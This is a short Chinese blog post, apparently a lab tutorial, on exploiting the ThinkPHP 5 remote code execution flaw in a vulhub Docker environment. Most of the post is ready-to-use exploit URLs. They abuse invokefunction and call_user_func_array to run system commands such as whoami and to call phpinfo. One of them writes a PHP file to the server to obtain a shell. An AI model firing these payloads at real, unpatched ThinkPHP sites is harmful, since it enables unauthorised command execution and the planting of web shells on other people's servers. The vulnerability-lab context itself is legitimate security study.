当前位置: 首页 > article >正文

Thinkphp(TP)框架漏洞攻略

1.环境搭建

vulhub/thinkphp/5-rce

docker-compose up -d

 2.访问靶场

远程命令执行:

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami 

远程代码执行:

 ? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3.Getshell

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

方式二: 利用工具


http://www.kler.cn/a/599560.html

相关文章:

  • HarmonyOS NEXT (六):系统安全架构
  • 内核中的互斥量
  • 《Python实战进阶》第31集:特征工程:特征选择与降维技术
  • 【蓝桥杯】每日练习 Day10
  • 平芯微PW2606过压保护芯片应用电路
  • 第二阶段面试题
  • 安宝特分享 | AR眼镜技术解析:B端与C端应用场景与设计差异
  • MediaPipe软件包如何构建和安装
  • Simula语言的安全开发
  • 嵌入式八股文学习笔记——C++学习笔记面向对象相关
  • 质检LIMS系统在临床试验机构的实践 临床试验的LIMS应用突破
  • Java实习生面试题(2025.3.23 be)
  • 安宝特分享|AR智能装备赋能企业效率跃升
  • redis7.4.2单机配置
  • CentOS 7 更换 yum 源(阿里云)+ 扩展 epel 源
  • 蓝桥杯备考:图的遍历
  • linux去掉绝对路径前面部分和最后的/符号
  • Proteus8打开Proteus7文件(.DSN格式)的方法
  • PyTorch Lightning工业级训练实战
  • Python 迭代器与生成器:深入理解与实践